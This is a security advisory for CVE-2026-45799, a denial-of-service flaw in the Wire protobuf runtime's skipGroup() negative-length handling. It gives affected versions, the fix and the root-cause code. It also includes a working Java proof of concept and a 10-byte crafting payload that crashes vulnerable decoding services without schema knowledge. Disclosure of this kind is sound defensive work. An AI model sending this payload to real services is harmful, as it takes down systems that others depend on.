Wire: skipGroup() missing negative-length check allows 10-byte payload to crash any Wire-decoding service

Description

CVE-2026-45799

Maintainer summary

Wire's protobuf group-skipping logic did not reject negative lengths before skipping a
length-delimited field inside a group. A crafted protobuf payload could cause Wire to throw an
unchecked runtime exception during decoding instead of the documented IOException /
ProtocolException failure path.

This can crash services that decode untrusted protobuf payloads and only handle Wire's documented
checked decoding failures.

Affected artifacts

com.squareup.wire:wire-runtime

Affected versions: vulnerable releases before 6.3.0.

Patched versions: 6.3.0 and later.

Users should upgrade to com.squareup.wire:wire-runtime:6.3.0 or later.

com.squareup.wire:wire-runtime-jvm

Affected versions: vulnerable legacy releases, including 5.3.1 and 5.3.3.

Patched versions: none.

com.squareup.wire:wire-runtime-jvm is a discontinued legacy artifact and will not receive a
patched release. Users should migrate to com.squareup.wire:wire-runtime:6.3.0 or later.

Wire 7 alpha releases

The fix has been merged to master and will be included in the next Wire 7 alpha release. Until
that release is available, Wire 7 alpha users should avoid decoding untrusted protobuf payloads with
affected alpha versions or build from a commit containing the fix.

Fix

The issue is fixed in Wire 6.3.0.

The fix rejects negative lengths while skipping groups and throws ProtocolException instead of
allowing the reader to move to an invalid position and later throw an unchecked runtime exception.

Credit

Reported by @TrekLaps.

Technical details

The following technical details are based on the original report, updated by the maintainers to
reflect the assigned CVE, the supported fixed artifact, and the discontinued status of
com.squareup.wire:wire-runtime-jvm.

ByteArrayProtoReader32.skipGroup() in wire-runtime did not validate that a
LENGTH_DELIMITED field's length is non-negative before calling skip(). A crafted protobuf
varint encodes -128 as a signed Int. When skip(-128) runs, the internal position counter
underflows to an invalid negative position. The next readByte() accesses the source with that
negative position, throwing ArrayIndexOutOfBoundsException, a RuntimeException that escapes
Wire's documented IOException boundary and can crash the request handler.

ProtoAdapter.decode(byte[]) is declared to throw IOException. Callers following the documented
API may catch only IOException, so unchecked runtime exceptions from malformed input can escape
the expected error boundary.

The originally confirmed vulnerable legacy versions include 5.3.1 and 5.3.3 for the
discontinued com.squareup.wire:wire-runtime-jvm coordinate. The supported replacement coordinate
is com.squareup.wire:wire-runtime, fixed in version 6.3.0.

Root cause

In the originally reported vulnerable code path, ByteArrayProtoReader32.skipGroup() read the
length as a signed Int and used it without validating that it was non-negative:

STATE_LENGTH_DELIMITED -> {
  val length = internalReadVarint32() // returns signed Int and can be negative
  skip(length)                        // no negative check
}

The internal skip() implementation then accepted the negative count because the computed
position was not greater than the limit:

private fun skip(byteCount: Int) {
  val newPos = pos + byteCount        // for example, 7 + (-128) = -121
  if (newPos > limit) throw EOFException()
  pos = newPos                        // pos = -121
}

The next read could then index the source with the invalid negative position:

private fun readByte(): Byte {
  if (pos == limit) throw EOFException()
  return source[pos++]                // source[-121] throws ArrayIndexOutOfBoundsException
}

Wire already rejected negative lengths in normal length-delimited field decoding. The same
validation was missing from group-skipping code.

The fix adds this validation when skipping groups:

STATE_LENGTH_DELIMITED -> {
  val length = internalReadVarint32()
  if (length < 0) throw ProtocolException("Negative length: $length...")
  skip(length)
}

The fix was applied to both ByteArrayProtoReader32.skipGroup() and ProtoReader.skipGroup().

Reproduction

The following reproduction was provided for vulnerable legacy wire-runtime-jvm releases such as
5.3.1 and 5.3.3:

curl -sL https://repo1.maven.org/maven2/com/squareup/wire/wire-runtime-jvm/5.3.3/wire-runtime-jvm-5.3.3.jar -o wire.jar
curl -sL https://repo1.maven.org/maven2/com/squareup/okio/okio-jvm/3.9.1/okio-jvm-3.9.1.jar -o okio.jar
curl -sL https://repo1.maven.org/maven2/org/jetbrains/kotlin/kotlin-stdlib/2.1.0/kotlin-stdlib-2.1.0.jar -o stdlib.jar
// WirePoc.java
import com.squareup.wire.AnyMessage;

public class WirePoc {
  public static void main(String[] args) throws Exception {
    byte[] payload = new byte[] {
      (byte) 0x9B, 0x06,                                          // field 99, START_GROUP
      0x0A,                                                       // field 1, LENGTH_DELIMITED
      (byte) 0x80, (byte) 0xFF, (byte) 0xFF, (byte) 0xFF, 0x0F,   // varint = -128
      (byte) 0x9C, 0x06                                           // field 99, END_GROUP
    };

    AnyMessage.ADAPTER.decode(payload);
  }
}
javac -cp "wire.jar:okio.jar:stdlib.jar" WirePoc.java
java -cp ".:wire.jar:okio.jar:stdlib.jar" WirePoc

Observed output on vulnerable versions:

Exception in thread "main" java.lang.ArrayIndexOutOfBoundsException: Index -120 out of bounds for length 10
    at com.squareup.wire.ByteArrayProtoReader32.readByte(ByteArrayProtoReader32.kt:448)
    at com.squareup.wire.ByteArrayProtoReader32.internalReadVarint32(ByteArrayProtoReader32.kt:294)
    at com.squareup.wire.ByteArrayProtoReader32.skipGroup(ByteArrayProtoReader32.kt:209)
    at com.squareup.wire.ByteArrayProtoReader32.nextTag(ByteArrayProtoReader32.kt:156)
    at com.squareup.wire.AnyMessage$Companion$ADAPTER$1.decode(AnyMessage.kt:150)
    at com.squareup.wire.AnyMessage$Companion$ADAPTER$1.decode(AnyMessage.kt:88)
    at com.squareup.wire.ProtoAdapter.decode(ProtoAdapter.kt:468)
    at WirePoc.main(WirePoc.java:10)

With the fix, the same payload is rejected with ProtocolException.

Why this can affect any Wire-decoding service

skipGroup() is called for any unknown field with wire type 3. An attacker can send an unknown
field, such as field 99, with wire type START_GROUP. The decoder skips it via skipGroup()
regardless of which message type the service uses, so no schema knowledge is required.

Payload:

9b060a80ffffff0f9c06

Payload breakdown:

0x9B 0x06                 field 99, wire type 3 (START_GROUP)
0x0A                      field 1, wire type 2 (LENGTH_DELIMITED) inside group
0x80 0xFF 0xFF 0xFF 0x0F  5-byte varint = -128 as signed Int
0x9C 0x06                 field 99, END_GROUP

Basic information

Type
reviewed
Severity
high
Advisory on GitHub
Open advisory ↗
Repository advisory
Open repository advisory ↗
Source code
Browse source ↗
Published (advisory)
2026-05-19 19:54:50 UTC
Updated
2026-05-19 19:54:51 UTC
GitHub reviewed
2026-05-19 19:54:50 UTC

EPSS Score

No EPSS score in this advisory JSON.

CVSS Scores

Base score Version Severity Vector
7.5 3.1
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H Click to expand
Attack vector (AV:N)
Could be attacked over the internet or any normal routed network—not just someone sitting at the machine.
Attack complexity (AC:L)
Once they can reach the bug, pulling it off is straightforward—no weird race conditions or rare setup.
Privileges required (PR:N)
No account or special rights needed—anonymous or random user is enough.
User interaction (UI:N)
Nobody has to click “OK” or open a trap file; it can work without a victim helping.
Scope (S:U)
Damage stays in the same “trust bubble” as the broken component—no big spill into unrelated systems.
Confidentiality (C:N)
Doesn’t really leak secrets in a meaningful way.
Integrity (I:N)
Data isn’t meaningfully altered or forged.
Availability (A:H)
Could take the service down hard or make it unusable for people who depend on it.

Identifiers

CWEs

CWE id Name
CWE-129 Improper Validation of Array Index

Credits

  • TrekLaps (reporter)

Affected packages (3)

Vulnerable version ranges and first patched releases as published by GitHub.

Ecosystem Package Vulnerable range First patched Vulnerable functions
maven com.squareup.wire:wire-runtime-jvm <= 5.3.3
maven com.squareup.wire:wire-runtime <= 6.2.0 6.3.0
maven com.squareup.wire:wire-runtime >= 7.0.0-alpha01, <= 7.0.0-alpha02 7.0.0-alpha03

References

cvelogic Threat Intelligence